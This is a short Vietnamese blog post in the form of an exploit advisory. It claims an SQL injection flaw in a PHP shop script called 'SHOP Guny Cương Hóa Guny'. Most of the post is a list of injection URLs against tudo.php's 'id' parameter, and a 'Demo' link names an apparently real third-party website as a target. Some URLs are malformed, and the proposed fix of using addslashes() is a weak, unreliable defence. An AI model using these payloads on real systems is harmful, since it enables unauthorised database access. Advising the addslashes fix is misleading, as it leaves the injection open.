Thứ Sáu, 19 tháng 4, 2013

Bug SHOP Guny Cương Hóa Guny

# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
# Exploit Title: SHOP Guny Cương Hóa Guny #
# Google Dork: n/a #


# Date: 16/4/13 #
# Exploit Author: VnDragon - VHB #
# Code Mod: http://www.vietvbb.vn/up/showthread.php?t=67076 #
# Version: [2.0.1] #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #

Code:
Exploit: http://victim.com/tudo.php?tudo=matkieng&id=1' [SQL]
Exploit: http://victim.com/tudo.php?tudo=mat&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=ao&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=toc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=non&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=trangsuc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=canh&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=vukhi&id=1' [SQL]
File: tudo.php, Line: 372 and more fille.
PHP Code:
$id $_GET['id']; 
Fix

Find
PHP Code:
$id $_GET['id']; 
And Replace

PHP Code:
$id addslashes($_GET['id']); 

Demo: http://jrockhome.com/tudo.php?tudo=mat&id=1'

Note: Phải có items mới tiến hành exploit được.

Không có nhận xét nào: